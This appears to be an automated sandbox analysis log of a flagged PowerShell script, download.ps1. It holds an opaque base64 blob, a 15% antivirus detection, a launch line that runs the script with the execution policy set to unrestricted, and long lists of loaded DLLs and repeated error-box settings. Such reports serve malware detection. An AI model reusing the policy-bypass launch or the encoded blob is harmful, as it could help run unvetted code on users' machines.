"aLh5ZDQ5ejhsctWrHrwts0W/Rb/ojDNzF9+fOGnnyRdK+nSAlE/7afAm+Ph48FEJY3RVA5zYCqvEje7X2kDrgLgV62zUOuxRgN7CMIlyL81/xc6AiO2Pkt38h6vPLe8NidKIr4N2JIcQipjZxFyeuQpECcKIl6Xpssry78eSqQ8/BR+vykmNuffKAcOXSs1qiMCIexqnR0cRBwrJoJjiz6MWdE+ejYhxAMWaEyNenYOVzZ3HyYmZudJycr/HhIwBT4T0cigG7yIyXqvukOmj3sOX74K+5H83ipb+xdJUxR53uKJ7gcmcjm9LsUZFvKdVmGAGGhkErMn+bCIeLFrIjJEEnvwDONxZ2h2pn2dK+3eaz13Ln1GVNWlG1IUODG9tH5gnjaKhRtfYjQyFeJ2DX2Jj6XMmDfrxEGytcoEXJKkT//HvQO3G4mLVqXJmHK0nIGGfwVgE31jHB5wDgm/ErtzNGwSVAojLmXxm88tHiNiZiOfLqK5P3O7EwsOz8bcX4OytmuvkNT/mqQ7KrASuFJoIbwbiZ8n6UbESw1+UzxeTrCJur1uHT3vWK1/4Dxv5wL6Es/eCJ0Gz58blNRxQFwUXQcUlud3JxeYj/pkO7dqxKV0dxzy+29gJJ08UMKNt0d+KrpPTYguHLEPHQFxU36H8HMaEZJ9FQAYCZs/1OHMfv16G4v2TZ+OGCoE1zZNWBVAID1J6S+/Ynik3UOkyKF/KbBGesOhKg2gG8enUPMiVjIe3eP0a01M8JlVOJDpCs2Y8WqNvme46mJM6HFMg2s4vw5EFbQrDPKimfwwVBK8UWOwCNoh3e+/rACPTLiPkMkuviuIj2CV4eV+6N/QCJ9olN8h0A3s6nH91AyoMjYjuMGxk6n1azfC0j0jU7o04C5EZRaNNAvx7Mx9xKZAi2EL2ASz8+fIHga+yMlY2/UFrXFXVbsrXTBOabBYClqn6ZfmjOP2Pt+wykTEeg9MLvr5KGR/1R10U/oTKAgVXqWGwvCNgWQlmTy9PQPSfBQDIleX6s1NudSaHHS9tyQ9MmMz810eSA7L6GQ6MGoNeRaHzhc3HMwMC7x0ndBNJLBK7TTDuNw9VGnEMZ5TmsVTk5+aBXg66Xz9Prc4Jn+Wyrff3Tw2Dq9DYxcaFLks/NNfoXQrD4dSwzP32ZomFuH5ak5iFIWh3fAdHgBw+K6rlp8UcAdWG9qhuN2xENKRXGuI6vm0zCDDyfLht3BPV6E54rQ8EJlmrKPhDVUV4tdNmhfwvVT9vi99SHWyKuVJolJpTabTirfQnf1oV65CXIP4+qaEmyViBqJfByOj+u4iBQEcWiIrVitxuOAiDzQ/YjZ9XECD1Eqs5iJgZ2R7b8vwiTLfSlpYzxtY6+1+KirDi22+n++Pn97vfBzJGdnUXf3odXtVJVp5LPFHoS0vRB3o9sz1wCI7Rg86klSECdo09uBkHzFugFFqd3T/durF9ZJo2HIllVp96VzHoWWUIpdAwB5WOB1wEX35IA3ktpBL/6o4GCoZh+00OToV5SboAIGIQGmhdJIq3/os6aGpud0ERI8PKZkqMDlA3+TpjLbdj8mJ4+Uu8i+xJVSCJXVH1qOY3Fii1AC0Vqsg1DZ7udqDMDd95Z8CkwzCh5nTBT8Zbj3HAeKyI0vdS+JqUC2HFiRQQmDlReK+ms+bQUOZUz6EL5iNZyDiP94zBhEoOWA8HRu7UclJGDu8vqm/JpLfLvWCNuZ31QCrabL3MV1r3dfj0l04v7l
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: .pdbpdblib.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WTn.pdb source: powershell.exe, 00000000.00000002.35027610827.000001753BF4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000000.00000002.35029076745.000001753C26C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-11D0-891F-00AA004B2E24}\InprocServer32 source: powershell.exe, 00000000.00000002.34952327482.00000175219E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.34952327482.00000175219E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34953626098.0000017523B38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.35027610827.000001753BF4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbh source: powershell.exe, 00000000.00000002.35027610827.000001753BF4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbyer Lin source: powershell.exe, 00000000.00000002.35029076745.000001753C26C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9861DD2A5 pushad ; iretd 0_2_00007FF9861DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9862F00AD pushad ; iretd 0_2_00007FF9862F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9862F2315 pushad ; iretd 0_2_00007FF9862F232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9862F6305 push eax; ret 0_2_00007FF9862F6549
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9862F64B3 push eax; ret 0_2_00007FF9862F6549

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
